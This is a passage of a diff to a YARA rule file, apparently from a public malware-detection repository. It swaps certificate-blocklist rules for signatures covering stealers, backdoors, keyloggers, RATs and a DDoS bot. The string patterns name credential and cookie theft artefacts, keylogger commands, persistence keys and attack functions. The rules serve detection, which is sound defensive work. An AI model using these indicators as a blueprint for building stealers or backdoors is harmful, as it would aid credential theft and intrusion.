-		logic_hash = "494afa3711d93c56d52b8ae944db737cb53db8d27f2255c7045c3bf4478995a3"
+		logic_hash = "c276f2b809caad680455fc4ca0a021887d4ff2c9114f05737542a1d3c5cca848"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2fb952bc1e3fcf85f68d6e2cb5fc46a519ce3fa9"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.BackNet"
+
+	strings:
+		$s1 = "Slave.Commands." fullword ascii
+		$s2 = "StartKeylogger" fullword ascii
+		$s3 = "StopKeylogger" fullword ascii
+		$s4 = "KeyLoggerCommand" fullword ascii
+		$s5 = "get_keyLoggerManager" fullword ascii
+		$s6 = "get_IgnoreMutex" fullword ascii
+		$s7 = "ListProcesses" fullword ascii
+		$s8 = "downloadurl" fullword wide
+		$pdb = "\\BackNet-master\\Slave\\obj\\Release\\Slave.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IntelliAdmin, LLC" and pe.signatures [ i ] . serial == "72:6e:e7:f5:99:9b:9e:85:74:ec:59:96:9c:04:95:5c" )
+		uint16( 0 ) == 0x5a4d and ( $pdb or all of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0A005D2E2Bcd4137168217D8C727747C : FILE
+rule DITEKSHEN_MALWARE_Win_Acridrain : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "AcidRain stealer payload"
 		author = "ditekSHen"
-		id = "c3888d90-0c09-539a-9155-a60e4670320d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "9890c9e0-ce53-5f08-9077-c73a9e4ba29c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4114-L4125"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L388-L401"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b4024cd0d6c9a86d3956b9ba5d9692fc7ec2d7aa399a56a0b12f9387801a0b08"
+		logic_hash = "11884073f4bf466503b07f297ae7fad188f79df148fcc7ca48827c7dbd07e211"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "df788aa00eb400b552923518108eb1d4f5b7176b"
-		importance = 20
+
+	strings:
+		$s1 = { 43 6f 6f 6b 69 65 73 (5c|2e) }
+		$s2 = { 74 65 6d 70 6c 6f 67 69 ?? }
+		$s3 = { 74 65 6d 70 50 ?? 68 }
+		$s4 = "Connecting to hostname: %s%s%s" fullword ascii
+		$s5 = "Found bundle for host %s: %p [%s]" fullword ascii
+		$s6 = "encryptedUsernamencryptedPassworERROR Don't copy string" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing JoinHope Image Technology Ltd." and pe.signatures [ i ] . serial == "0a:00:5d:2e:2b:cd:41:37:16:82:17:d8:c7:27:74:7c" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D3D74Ae548830D5B1Bca9856E16C564A : FILE
+rule DITEKSHEN_MALWARE_Linux_Chachaddos : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "ChaChaDDoS variant of XorDDoS payload"
 		author = "ditekSHen"
-		id = "692ef744-9609-5cb1-b425-3bacf012fcdb"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "78a5cf3a-0e84-59bd-a936-bd335647e3d0"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4127-L4138"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L403-L418"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c72f10af530a6af4526ad956ef6058d097417a8fe3b902e3c7cba27b04e0c2c1"
+		logic_hash = "2bf99771046650820f02a24d5bd825afeacd03d1e865b05d8563a3ef74d521fb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3f996b75900d566bc178f36b3f4968e2a08365e8"
-		importance = 20
+
+	strings:
+		$x1 = "[kworker/1:1]" ascii
+		$x2 = "-- LuaSocket toolkit." ascii
+		$x3 = "/etc/resolv.conf" ascii
+		$x4 = "\"macaddress=\" .. DEVICE_MAC .. \"&device=\" .." ascii
+		$x5 = "easy_attack_dns" ascii
+		$x6 = "easy_attack_udp" ascii
+		$x7 = "easy_attack_syn" ascii
+		$x8 = "syn_probe" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Insite Software Inc." and pe.signatures [ i ] . serial == "00:d3:d7:4a:e5:48:83:0d:5b:1b:ca:98:56:e1:6c:56:4a" )
+		uint16( 0 ) == 0x457f and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_41F8253E1Ceafbfd8E49F32C34A68F9E : FILE
+rule DITEKSHEN_MALWARE_Multi_Exaramel : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Exaramel Windows/Linux backdoor payload"
 		author = "ditekSHen"
-		id = "84bd03de-88cd-5180-af11-916dbecd0366"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "014f10f3-4502-5719-93f6-4b2940f53876"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4140-L4151"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L420-L459"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "53f71030815dcdda8424fe858d26a08cf947a683e69c50ea5fda53f51b88bb93"
+		logic_hash = "e64383304bc913b07a2e63d61c81354b996c01171357005f4a28957d4d889599"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "02e739740b88328ac9c4a6de0ee703b7610f977b"
-		importance = 20
+		clamav_sig1 = "MALWARE_Linux.Backdoor.Exaramel"
+		clamav_sig2 = "MALWARE_Win.Backdoor.Exaramel"
+
+	strings:
+		$s1 = "vendor/golang_org/x/crypto/" ascii
+		$s2 = "vendor/golang_org/x/net/http2" ascii
+		$s3 = "vendor/golang_org/x/text/unicode" ascii
+		$s4 = "vendor/golang_org/x/text/transform" ascii
+		$s5 = "config.json" ascii
+		$cmd1 = "App.Update" ascii
+		$cmd2 = "App.Delete" ascii
+		$cmd3 = "App.SetProxy" ascii
+		$cmd4 = "App.SetServer" ascii
+		$cmd5 = "App.SetTimeout" ascii
+		$cmd6 = "IO.WriteFile" ascii
+		$cmd7 = "IO.ReadFile" ascii
+		$cmd8 = "OS.ShellExecute" ascii
+		$cmd9 = "awk 'match($0, /(upstart|systemd|sysvinit)/){ print substr($0, RSTART, RLENGTH);exit;" ascii
+		$ws1 = "/commands/@slp" wide
+		$ws2 = "/commands/cmd" wide
+		$ws3 = "/settings/proxy/@password" wide
+		$ws4 = "/settings/servers/server[@current='true']" wide
+		$ws5 = "/settings/servers/server/@current[text()='true']" wide
+		$ws6 = "/settings/servers/server[text()='%s']/@current" wide
+		$ws7 = "/settings/servers/server[%d]" wide
+		$ws8 = "/settings/storage" wide
+		$ws9 = "/settings/check" wide
+		$ws10 = "/settings/interval" wide
+		$ws11 = "report.txt" wide
+		$ws12 = "stg%02d.cab" ascii
+		$ws13 = "urlmon.dll" ascii
+		$ws14 = "ReportDir" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Smartspace Software technology Co.,Limited" and pe.signatures [ i ] . serial == "41:f8:25:3e:1c:ea:fb:fd:8e:49:f3:2c:34:a6:8f:9e" )
+		( uint16( 0 ) == 0x457f and ( all of ( $s* ) and 6 of ( $cmd* ) ) ) or ( uint16( 0 ) == 0x5a4d and 12 of ( $ws* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0A5B4F67Ad8B22Afc2Debe6Ce5F8F679 : FILE
+rule DITEKSHEN_MALWARE_Linux_Hiddenwasp : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "HiddenWasp backdoor payload"
 		author = "ditekSHen"
-		id = "e1cc3d27-4f76-58a8-8dd6-fd8dbe48252e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "220e5e6e-7c5c-5f70-b3eb-50d9c5ec636d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4153-L4164"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L461-L486"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "19cf46c112b546c26f12891727fdbc74aaa78bbdcdbc4e041781394f4cf5f719"
+		logic_hash = "a2aad022de41ba2633fc92a7dc5a5fa2efde9da2211cfc01fb2999e33365d6c9"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		thumbprint = "1213865af7ddac1568830748dbdda21498dfb0ba"
-		importance = 20
+		clamav_sig1 = "MALWARE_Linux.Trojan.HiddenWasp-ELF"
+		clamav_sig2 = "MALWARE_Linux.Trojan.HiddenWasp-Script"
+
+	strings:
+		$x1 = "I_AM_HIDDEN" fullword ascii
+		$x2 = "HIDE_THIS_SHELL" fullword ascii
+		$x3 = "NewUploadFile" ascii
+		$x4 = "fake_processname" ascii
+		$x5 = "swapPayload" ascii
+		$x6 = /Trojan-(Platform|Machine|Hostname|OSersion)/ fullword ascii
+		$s1 = "FileOpration::GetFileData" fullword ascii
+		$s2 = "FileOpration::NewUploadFile" fullword ascii
+		$s3 = "Connection::writeBlock" fullword ascii
+		$s4 = /hiding_(hidefile|enable_logging|hideproc|makeroot)/ fullword ascii
+		$s5 = "Reverse-Port" fullword ascii
+		$s6 = "hidden_services" fullword ascii
+		$s7 = "check_config" fullword ascii
+		$s8 = "__data_start" fullword ascii
+		$s9 = /patch_(suger_lib|ld|lib)/ fullword ascii
+		$s10 = "hexdump -ve '1/1 \"%%.2X\"' %s | sed \"s/%s/%s/g\" | xxd -r -p > %s.tmp"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Farad LLC" and pe.signatures [ i ] . serial == "0a:5b:4f:67:ad:8b:22:af:c2:de:be:6c:e5:f8:f6:79" )
+		uint16( 0 ) == 0x457f and ( 4 of ( $x* ) or all of ( $s* ) or ( 3 of ( $x* ) and 5 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_65Cd323C2483668B90A44A711D2A6B98 : FILE
+rule DITEKSHEN_MALWARE_Multi_Wellmess : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "WellMess Windows/Linux backdoor payload"
 		author = "ditekSHen"
-		id = "b976e930-cf9a-5b0f-9a1b-c35c3f134bdd"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "cfa0f077-9d45-5796-b888-66fb397e74f8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4166-L4177"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L488-L510"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e0a9868f9a42aeb8f90aff540a73bc8fa1bfebbf8ee6c0c71bd921cf914e0875"
+		logic_hash = "9cbbca609fd289d7406d9073237688d250dc68c450676b9b755509540d8f76a5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "188810cf106a5f38fe8aa0d494cbd027da9edf97"
-		importance = 20
+		clamav_sig1 = "MALWARE_Win.Trojan.WellMess_DotNet"
+		clamav_sig2 = "MALWARE_Win.Trojan.WellMess_Golang"
+		clamav_sig3 = "MALWARE_Linux.Trojan.WellMess_Golang"
+
+	strings:
+		$s1 = "-----BEGIN PUBLIC KEY-----" ascii
+		$s2 = "-----END PUBLIC KEY-----" ascii
+		$s3 = "net/http.(*persistConn).readResponse" ascii
+		$s4 = "net/http/cookiejar.(*Jar).SetCookies" ascii
+		$s5 = "_/home/ubuntu/GoProject/src/bot/botlib" ascii
+		$s6 = "<;head;><;title;>" ascii
+		$s7 = "<;title;><;service;>" ascii
+		$s8 = "http://invalidlookup" ascii
+		$s9 = "<autogenerated>" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Giperion" and pe.signatures [ i ] . serial == "65:cd:32:3c:24:83:66:8b:90:a4:4a:71:1d:2a:6b:98" )
+		( uint16( 0 ) == 0x457f or uint16( 0 ) == 0x5a4d ) and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0F7E3Fda780E47E171864D8F5386Bc05 : FILE
+rule DITEKSHEN_MALWARE_Win_Konni : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Konni payload"
 		author = "ditekSHen"
-		id = "33b8ce54-fa2c-5aac-9022-2309f7fc4a86"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "86eae9f6-60b0-5720-8528-ddbe32b6d4a6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4192-L4203"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L512-L530"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "30e2daf85ee7f9f9615a49af949a034b50a97a1a7abf6a318547809cc9e7b0b7"
+		logic_hash = "d57c51f7ede28b74395e5e0fbcc5fd9247b3353330f3e549d5abf99bbd7a1b93"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1e3dd5576fc57fa2dd778221a60bd33f97087f74"
-		importance = 20
+
+	strings:
+		$s1 = "uplog.tmp" fullword wide
+		$s2 = "upfile.tmp" fullword wide
+		$s3 = "%s-log-%s" fullword ascii wide
+		$s4 = "%s-down" ascii wide
+		$s5 = "%s-file-%s" fullword ascii wide
+		$s6 = "\"rundll32.exe\" \"%s\" install" fullword wide
+		$s7 = "subject=%s&data=" fullword ascii
+		$s8 = "dll-x64.dll" fullword ascii
+		$s9 = "dll-x32.dll" fullword ascii
+		$pdb1 = "\\virus-dropper\\Release\\virus-dropper.pdb" ascii
+		$pdb2 = "\\virus-init\\Release\\virus-init.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Louhos Solutions Oy" and pe.signatures [ i ] . serial == "0f:7e:3f:da:78:0e:47:e1:71:86:4d:8f:53:86:bc:05" )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $pdb* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C2Cbbd946Bc3Fdb944D522931D61D51A : FILE
+rule DITEKSHEN_MALWARE_Win_Bitterrat : FILE
 {
 	meta:
-		description = "Detects executables signed with Sordum Software certificate, particularly Defender Control"
+		description = "BitterRAT payload"
 		author = "ditekSHen"
-		id = "b8ccfb1a-4e3f-5823-af38-e1607458023e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "cccb2102-b78a-59ce-98e6-c702c4bec4d4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4231-L4242"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L532-L551"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6e67835cf85c713ef5a21b866a277e90236c607fb67d3fd9b2bba627c31d9e97"
+		logic_hash = "f9dec388af6ddc767f82d7de7ba47754e76058022e6e55bbafd846ca8655a03b"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "f5e71628a478a248353bf0177395223d2c5a0e43"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.BitterRAT"
+
+	strings:
+		$s1 = "getfile" fullword wide
+		$s2 = "getfolder" fullword wide
+		$s3 = "winmgmts://./root/default:StdRegProv" fullword wide
+		$s4 = "winlog" fullword wide
+		$s5 = "winprt" fullword wide
+		$s6 = "c:\\intel\\" fullword ascii
+		$s7 = "AXE: #" fullword ascii
+		$s8 = "Bld: %s.%s.%s" fullword ascii
+		$s9 = "53656C656374202A2066726F6D2057696E33325F436F6D707574657253797374656D" wide nocase
+		$pdb1 = "\\28NovDwn\\Release\\28NovDwn.pdb" ascii
+		$pdb2 = "\\Shellcode\\Release\\Shellcode.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sordum Software" and pe.signatures [ i ] . serial == "c2:cb:bd:94:6b:c3:fd:b9:44:d5:22:93:1d:61:d5:1a" )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $* ) or ( 4 of ( $s* ) and 1 of ( $pdb* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6E3B09F43C3A0Fd53B7D600F08Fae2B5 : FILE
+rule DITEKSHEN_MALWARE_Win_Tjkeylogger : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "TJKeylogger payload"
 		author = "ditekSHen"
-		id = "d23e7b9b-4424-50c5-a768-9cb33e0de192"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "6aaa11b2-3734-5538-b593-f5276f3acc72"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4244-L4255"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L553-L567"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "45e2833dedacd875912d07dc63216400ddff76846f9c7bdf808f1db56ed4720c"
+		logic_hash = "52d98a6f5a2cfc6717b7097b4e70c1e813851222f9f06ae74be4e5703b0b0dde"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "677054afcbfecb313f93f27ed159055dc1559ad0"
-		importance = 20
+
+	strings:
+		$s1 = "TJKeyLogger" fullword ascii
+		$s2 = "software\\microsoft\\windows\\currentversion\\run" fullword ascii
+		$s3 = "\\Passwords.txt" ascii
+		$s4 = "TJKeyLogItem" fullword ascii
+		$s5 = "TJKeyAsyncLog" fullword ascii
+		$s6 = "FM_GETDSKLST" fullword ascii
+		$s7 = "KL_GETMODE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Divisible Limited" and pe.signatures [ i ] . serial == "6e:3b:09:f4:3c:3a:0f:d5:3b:7d:60:0f:08:fa:e2:b5" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Aa12C95D2Bcde0Ce141C6F1145B0D7Ef : FILE
+rule DITEKSHEN_MALWARE_Win_W1RAT : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "W1 RAT payload"
 		author = "ditekSHen"
-		id = "66ef7681-7467-5c9f-8e0b-749a9711f15a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d5841bc0-97e7-575e-91f6-d264f507a8b5"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4257-L4268"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L569-L585"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "34edd92640d8059f074513b526c7a2bf0d9265af9466a2ae66b93255044744c4"
+		logic_hash = "84b9a2e309ed9ab0fb8343d941585356d23348683073d0a37fc7194f58a43a0e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1383c4aa2900882f9892696c537e83f1fb20a43f"
-		importance = 20
+
+	strings:
+		$s1 = "/c /Ox /Fa\"%s/%s.asm\" /Fo\"%s/%s.obj\" \"%s/%s.%s\"" ascii
+		$s2 = "this->piProcInfo.hProcess" fullword ascii
+		$s3 = "index >= 0 && index < this->reg_tab->GetLen()" fullword ascii
+		$s4 = "strcpy(log_font.lfFaceName,\"%s\");" fullword ascii
+		$s5 = "WorkShop -- [%s]" fullword ascii
+		$s6 = "HeaderFile.cpp" fullword ascii
+		$s7 = "WndLog.cpp" fullword ascii
+		$s8 = "assertion fail \"%s\" at file=%s line=%d" fullword ascii
+		$s9 = "Stdin   pipe   creation   failed" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROKON, OOO" and pe.signatures [ i ] . serial == "00:aa:12:c9:5d:2b:cd:e0:ce:14:1c:6f:11:45:b0:d7:ef" )
+		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) ) or ( all of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_03E9Eb4Dff67D4F9A554A422D5Ed86F3 : FILE
+rule DITEKSHEN_MALWARE_Win_Raccoon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Raccoon stealer payload"
 		author = "ditekSHen"
-		id = "b76ab1af-01f9-5d03-8d5e-7314a7a2de43"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "5ebef663-623c-592e-b69a-f620492f0cc1"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4270-L4281"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L587-L606"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a56f53cb94f78496b4935fc2a613d030bd550b749427501dd9dda18cb9e05ab3"
+		logic_hash = "258481982d20d229506f442a5a205fdc05f6ac4399f3a0665860e6529c30943b"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "8f2de7e770a8b1e412c2de131064d7a52da62287"
-		importance = 20
+
+	strings:
+		$s1 = "inetcomm server passwords" fullword wide
+		$s2 = "content-disposition: form-data; name=\"file\"; filename=\"data.zip\"" fullword ascii
+		$s3 = ".?AVfilesystem_error@v1@filesystem@experimental@std@@" fullword ascii
+		$s4 = "CredEnumerateW" fullword ascii
+		$s5 = "%[^:]://%[^/]%[^" fullword ascii
+		$s6 = "%99[^:]://%99[^/]%99[^" fullword ascii
+		$s7 = "Login Data" wide
+		$s8 = "m_it.object_iterator != m_object->m_value.object->end()" fullword wide
+		$x1 = "endptr == token_buffer.data() + token_buffer.size()" fullword wide
+		$x2 = "\\json.hpp" wide
+		$x3 = "Microsoft_WinInet_" fullword wide
+		$x4 = "Microsoft_WinInet_*" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "philandro Software GmbH" and pe.signatures [ i ] . serial == "03:e9:eb:4d:ff:67:d4:f9:a5:54:a4:22:d5:ed:86:f3" )
+		uint16( 0 ) == 0x5a4d and ( ( 3 of ( $x* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) and 1 of ( $x* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4A7F07C5D4Ad2E23F9E8E03F0E229Dd4 : FILE
+rule DITEKSHEN_MALWARE_Win_Tefosteal : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Tefosteal payload"
 		author = "ditekSHen"
-		id = "4e39ae25-c62c-5018-9780-d1549b10942f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "56646933-3ed3-5b77-9135-993b57603490"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4283-L4294"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L653-L674"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2493dfe7e5a993a573c7b3c2f2642a8834feb525b3fc8402315a63ac09b9fccd"
+		logic_hash = "a350863270cbe3349f271e55d66a2ebdd6406e8d122c11071de74a774eb77ebf"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		thumbprint = "b37e7f9040c4adc6d29da6829c7a35a2f6a56fdb"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Tefosteal"
+
+	strings:
+		$s1 = "netsh wlan show networks mode=bssid" nocase fullword wide
+		$s2 = "LoginCredentialService.GetLoginCredentials$" ascii
+		$s3 = "DefaultLoginCredentials.LoginEventUsrPw$" ascii
+		$s4 = "SEC_E_NO_KERB_KEY" wide
+		$s5 = "TList<System.Zip.TZipHeader>." ascii
+		$s6 = "_Password.txt" fullword wide nocase
+		$s7 = "_Cookies.txt" fullword wide nocase
+		$f1 = "\\InfoPC\\BSSID.txt" wide
+		$f2 = "\\Files\\Telegram\\" wide
+		$f3 = "\\InfoPC\\Screenshot.png" wide
+		$f4 = "\\InfoPC\\Systeminfo.txt" wide
+		$f5 = "\\Steam\\config" wide
+		$f6 = "\\delete.vbs" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Danalis LLC" and pe.signatures [ i ] . serial == "4a:7f:07:c5:d4:ad:2e:23:f9:e8:e0:3f:0e:22:9d:d4" )
+		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) and 2 of ( $f* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C6D7Ad852Af211Bf48F19Cc0242Dcd72 : FILE
+rule DITEKSHEN_MALWARE_Win_Cryptostealergo : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "CryptoStealerGo payload"
 		author = "ditekSHen"
-		id = "1aca90d4-6cb6-5bcd-a4c9-e8f8cddc0d04"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "83886aeb-af7e-564c-989a-fb7d955814e2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4296-L4307"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L676-L692"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e10de48bfa1edec81157eb95ef3478346c22dd6f7ef163e30887d3c7bb580c5e"
+		logic_hash = "0050be7522e7d89cb9688e63fdca11d24baa74aa858e8c19ee7b4658518536b6"
 		score = 75
 		quality = 75
 		tags = "FILE"
